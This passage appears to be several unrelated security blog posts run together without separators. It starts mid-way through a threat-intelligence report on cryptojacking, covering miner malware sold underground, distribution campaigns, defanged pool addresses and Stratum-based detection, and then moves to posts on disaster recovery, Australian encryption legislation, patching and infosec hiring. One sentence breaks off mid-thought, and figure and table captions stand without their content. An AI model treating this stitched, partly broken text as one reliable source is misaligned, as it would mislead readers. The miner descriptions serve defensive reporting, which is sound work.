In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)

Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64-bit and 32-bit (x86) Windows OS
  • Hides from the following popular task managers:
    • Windows Task Manager
    • Process Killer
    • KillProcess
    • System Explorer
    • Process Explorer
    • AnVir
    • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU or network load could leave industrial infrastructure unresponsive, preventing operators from interacting with the controlled process in real time.

The electricity cost, measured in kilowatt-hours (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212 kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.
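The arithmetic behind such estimates is straightforward to reproduce. The sketch below uses the researchers' measured consumption of 1.212 kWh per machine per day; the per-kWh rate and fleet size are illustrative assumptions, not the figures behind the cited estimates:

```python
# Rough cryptojacking electricity-cost estimator.
# The daily consumption figure comes from the Coinhive measurement cited
# above; the rate and machine count below are illustrative placeholders.

KWH_PER_MACHINE_PER_DAY = 1.212

def monthly_cost(machines: int, rate_per_kwh: float, days: int = 30) -> float:
    """Estimated monthly electricity cost, in the rate's currency."""
    return machines * KWH_PER_MACHINE_PER_DAY * days * rate_per_kwh

# A hypothetical fleet of 500 infected endpoints at an assumed $0.12/kWh:
print(round(monthly_cost(500, 0.12), 2))  # 2181.6
```

Scaled across an enterprise network, even a modest per-machine cost adds up quickly, which is why electricity is listed among the three cost fronts above.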

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems

Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, two technologies developers use to deploy and scale applications across a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.

Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking


FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub Pages, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As the researchers pointed out, closing the browser window may not be enough to interrupt the activity, and more advanced actions, such as killing the process from the Task Manager, may be required.

Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.
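The traffic-splitting logic Trend Micro described in the DoubleClick campaign above is simple to model. The sketch below mirrors the reported 1-to-100 random roll as a defender-side illustration; the script names are placeholders, not the actual ad payload:

```python
import random

def pick_miner_script(rng: random.Random) -> str:
    """Mirror the reported logic: a random 1-100 roll decides which miner
    variant the malicious ad would load (names are placeholders)."""
    roll = rng.randint(1, 100)
    if roll > 10:
        return "coinhive.min.js"     # stock Coinhive script, ~90% of visits
    return "modified-coinhive.js"    # custom miner on the private pool, ~10%

rng = random.Random(0)
picks = [pick_miner_script(rng) for _ in range(1000)]
print(picks.count("modified-coinhive.js"))  # roughly 100 of 1000 visits
```

Splitting traffic this way lets the operators route a small fraction of victims to their own pool, which (as noted above) was likely intended to dodge Coinhive's commission.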

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat, as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that target users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools and

Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Crypto-Loot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).

Figure 10: Cryptocurrency miner detection activity per month

Figure 11: Commonly observed pools and associated ports

Figure 12: Top 10 affected countries

Figure 13: Top five affected industries

Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.

Figure 15: Stratum subscription request parameters
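Because unencrypted Stratum subscriptions are plain JSON-RPC, the DPI check described above can be approximated in a few lines. A minimal payload-inspection sketch follows; the field names match the Stratum protocol, while the method list is an illustrative assumption:

```python
import json

# Methods commonly seen in Stratum mining sessions; the list is illustrative
# and would be tuned for a real DPI deployment.
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "login", "mining.submit"}

def looks_like_stratum(payload: bytes) -> bool:
    """Heuristic: does this TCP payload look like a Stratum JSON-RPC request?"""
    try:
        msg = json.loads(payload.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return False
    # Subscription requests carry the id, method, and params entities
    # noted in Figure 15.
    return (isinstance(msg, dict)
            and {"id", "method", "params"} <= msg.keys()
            and msg.get("method") in STRATUM_METHODS)

sample = b'{"id": 1, "method": "mining.subscribe", "params": ["XMRig/2.4"]}'
print(looks_like_stratum(sample))  # True
```

A rule like this only works against Stratum over unencrypted TCP; the TLS case is addressed in the next section.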

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.


Conclusion

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate a continued upward trend of threat actors conducting cryptocurrency mining operations, a focus we expect to continue throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as other forms of fraud or theft. Further, victims may not realize their computer is infected beyond noticing a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

When Disaster Comes Calling

There are times like this when I can’t help but wonder about disaster recovery plans. A large number of companies that I have worked at or spoken with over the years seemed to pay little more than lip service to this rather significant elephant in the room. This came to mind today while I was reading about the storm that ran roughshod over Toronto. In the midst of all the flooding, I read that the servers at Toronto’s Pearson airport (YYZ) had become, well, rather wet. There was “flooding in server rooms,” according to their tweet on July 8th at 9:16 pm.

This really got me thinking as to how this could have happened in the first place.

At one organization that I worked for, the role of disaster recovery planning fell to an individual who had neither the interest nor the wherewithal to accomplish the task. This is a real problem for many companies and organizations. The fate of their operations can, at times, reside in the hands of someone who is disinclined to properly perform the task.

Of course this is not true of every company. But there are many instances where it is only the sheer force of will of the staff that restores service in the event of an outage. One company that I worked for suffered an SAP outage that meant invoices could not be paid. The impact of this was a massive financial burden, and it took the better part of a month to sort out. There was no disaster recovery plan. There was no system backup. There was no failover. Through the Herculean efforts of the staff, invoices were paid manually.

A second example that I can’t help but pull from the archives was when I was working for a certain power company. It was the end of the day and I was heading for the door with my coworker. We came upon our head of IT operations and one of the building security guards working feverishly to contain a water leak in the janitorial closet. The faucet would not close. We dropped our bags and pitched in to help.

In relatively short order the tap sheared off from the wall and the real flooding began. The difficulty that presented itself was that the main water shut-off valve was nowhere to be found. There was no disaster recovery plan that covered this contingency. To make matters worse, the computer control room was located on the floor directly below the janitorial closet.

Um, yeah.

Ultimately the situation was resolved and the control room was saved. But, it should have never gotten to that point.

So what is the actionable takeaway from this post? Take some time to review your organization’s disaster recovery plans. Are backups taken? Are they tested? Are they stored offsite? Does the disaster recovery plan even exist anywhere on paper? Has that plan been tested with the staff? No plan survives first contact with the “enemy,” but it is far better to be well trained and prepared than to be caught unawares.

Even if you’re not directly involved with the plans in your shop be sure to ask the question. Are we prepared?

Originally posted on CSO Online by me.

The post When Disaster Comes Calling appeared first on Liquidmatrix Security Digest.

By targeting encrypted content, Australia threatens press freedom

Jole Aron

The Australian government is considering legislation that would endanger source protection, confidential reporting processes, and the privacy of everyone in an ill-conceived effort to grant law enforcement easier access to electronic communications.

Freedom of the Press Foundation has joined a group of digital rights organizations in calling for the Australian government to refrain from any effort to weaken access to encrypted communication services. “We strongly urge the government to commit to not only supporting, but investing in the development and use of encryption and other security tools and technologies that protect users and systems,” the open letter to Australian officials states.

While it has not yet introduced such legislation, the government has consistently reiterated its intention to do so over the past year. In July 2017, Australian Prime Minister Malcolm Turnbull and Attorney General George Brandis held a press conference at which they first stated their intention to force communications companies to comply with law enforcement decryption efforts. Months later, the foreign minister said legislation intended to enlist communication providers in stopping terrorism was imminent.

It’s unclear what this legislation will look like, but communication companies or device makers could face significant government fines if they refuse to assist law enforcement with accessing users’ data. This could apply not only to Australian telecommunications companies like Telstra and Optus, but also to huge, internationally-based tech companies like Facebook and Apple.

If companies have the ability to decrypt their users’ data and hold their private encryption keys, those companies could be forced to provide confidential communications anytime the government deems access necessary. Angus Taylor, Australia’s Minister for Law Enforcement and Cyber Security, has claimed there will be no requirement for companies to build “backdoors” into their products for law enforcement, but the alternative to undermining encryption itself is to target physical devices.

This is one of the fears of Nathan White, Senior Legislative Manager at Access Now. He is concerned that rather than compelling WhatsApp or Gmail to provide access to encrypted content, the legislation will force device manufacturers to push targeted malware to the devices of people who are the subject of investigations.

Regular software updates are critical to security and privacy, because they often fix vulnerabilities and introduce new protections. Laws that could force a company like Apple to target a user’s device with malware would eradicate the trust between device makers and their users that software updates depend on. The government could hypothetically demand that malware be sent to the devices of journalists, sources, or activists, and use the confidential communications acquired through that malware to investigate or prosecute them.

Attorney General Brandis has called encryption “potentially the greatest degradation of intelligence and law enforcement capability” in a lifetime. He has indicated that the new laws would be akin to the United Kingdom’s Investigatory Powers Act, and would grant the government the ability to force companies to comply with investigations.

It’s a chilling comparison to make. The Investigatory Powers Act is one of the world’s most Orwellian and sweeping surveillance laws, authorizing the blanket collection, monitoring, and retention of citizens’ communications and online activity.

Australia is also part of the powerful “Five Eyes” intelligence alliance, which includes the United Kingdom, the United States, New Zealand, and Canada. The adoption of laws that use broad “terrorism” claims to justify weakening encryption or targeting devices could not only open the door to similar legislation in other countries but even normalize international sharing of decrypted sensitive data. (Australia is also hosting a Five Eyes meeting in August, where these legislative efforts could be discussed.)

It’s unclear what this legislation will look like, or when it will be introduced, but it will be met with widespread opposition when it arrives. Any law that threatens software updates or encryption would threaten the privacy of everyone in Australia, and set a disturbing precedent for governments and intelligence agencies around the world.

Never patch another system again

Over the years I have been asked a curious question numerous times: “If we use product X or solution Y we wouldn’t have to patch anymore, right?” At this point in the conversation I would often sit back in my seat and try to look like I was giving their question a lot of thought. The reality was more pragmatic: I was trying very hard to stifle my screams while appearing considerate of their query.

Let’s be honest with ourselves: no one likes to apply patches. If the opposite were true, I have little doubt that we would have far fewer data breaches than we read about in the news these days. I’m sure there is a mythical unicorn out there who simply lives for this sort of activity. I will be entirely honest when I say that I have never met this person.

Applying patches is a very necessary activity. So why is it that we continually have to return to this discussion point? Time and again we read in the press about companies that were compromised because of a missed patch or configuration error. One of the things I do a fair bit of is reading the data breach notices that companies issue, and some trends are inescapable. A piece of software wasn’t patched to current. There was a configuration error. Or a laptop was stolen but, have no fear, there was a password.

Two of the aforementioned were easily preventable situations and the third…well, I’ll just leave that one alone for this post.

Let’s just dispense with the nonsense. There is no product on this little blue marble that we call home that will ever give you 100% security. It just isn’t going to happen. Full stop. There are so many moving parts in the modern IT ecosystem that we have to take this into account. And there is a real problem that we drift farther away from each and every day: we are failing to tackle the fundamentals well, and as a result the security of our digital supply chain is suffering.

I often get teased by some friends for using the phrase “defined repeatable process”. This idea is absolutely nothing new; the term has been floating around for a long while now, but we seem incapable of implementing such processes. Why is that? When we drift away from doing things well, such as patching, we inadvertently increase our technical security debt. As this chasm continues to widen, there will come a point after which most organizations will not be able to pivot to the safety of higher ground.

So as I knock this idea around in my head I continue to wonder what it is that we can do to improve things from a repeatable process standpoint.

Go ahead and put your feet up on your desk, basking in the glow of knowledge that some vendor is going to solve all of your security issues. Never patch another system again, and we shall gleefully dance around the smoldering crater that was once your enterprise network after the hordes of attackers are done savaging it.

An apple a day keeps the doctor away and all that sort of rot.

Originally posted on CSO Online by me.

The post Never patch another system again appeared first on Liquidmatrix Security Digest.

InfoSec Recruiting – Is the Industry Creating its own Drought?

The InfoSec industry has a crippling skills shortage, or so we’re told. There’s a constant stream of articles, keynotes, research and initiatives all telling us of the difficulty companies have in finding new talent. I’ve been in the industry for over 30 years now and through my role as one of the directors of Security BSides London, I often help companies who are struggling to grow their teams. More recently, my own circumstances have led me to once again join the infosec candidate pool and go through the job hunt and interview process.

I have been in the position of hiring resources in the past and understand that it is not easy and takes time. But having sat through a few interviews of my own now, I am beginning to wonder if we have not brought this situation upon ourselves. Are the expectations of recruiters out of proportion? Are they expecting to uncover a hidden gem that ticks every single box? Is it really true that the infosec talent pool is running empty, or is it that the hiring process in the industry is creating its own drought?

Part of this situation may be coming from the way hiring managers are questioning candidates. There is no perfect questioning methodology, but today, focusing purely on technical questions cannot be a good solution because – LMGTFY – even fairly lazy candidates can study and prepare for any technical questions beforehand. It might seem obvious that a hiring manager needs to look at a wider scope, evaluating the candidate’s ability to learn, adapt, and demonstrate their analytic or creative capabilities, but this is the part that seems to be missed.

I’ve found that candidate questioning within some organisations has become vague and far too open-ended to provide a meaningful evaluation. For example, I recently was asked – and know of a few other people who were asked – the open-ended question: “What happens when you use a browser?”. I won’t go into the pros and cons of this specific question in the hiring process as it is quite well covered in the post: The “What happens when you use a browser?” Question from Scott J Roberts.

This type of question can be answered in so many ways, from a high-level overview to the nuts and bolts. And when the candidate was building networks before the Internet was really a thing, and was probably already working before the hiring manager was born, they’re unlikely to simply guess which response they should give. Engaging and discussing the situation with the candidate resembles the normal process of working through and analysing a problem to achieve a target.

Now that I have experienced this type of questioning first-hand, I’ve been dumbfounded as to the total lack of interactivity from the hiring manager across the table. My natural reaction to an unclear, vague or unspecific question is to question it; discuss and clarify to identify a common ground and answer in a more appropriate way. The problem lies in that the hiring manager typically won’t engage at all, simply stating that it is an “open-ended question and to answer how I feel best”. How can this be a constructive way to gauge a candidate’s abilities?

I’ve always taught and been taught that asking questions is a good thing: it demonstrates logical and analytical thinking and shows that you are trying to better understand the situation and audience and react with the most appropriate response. If a hiring manager simply pursues a vague line of questioning, they’ll only ever be able to evaluate a candidate by making a subjective decision. I’ve even heard reports that hiring managers have rejected a candidate on the basis that they felt the person would outshine them.

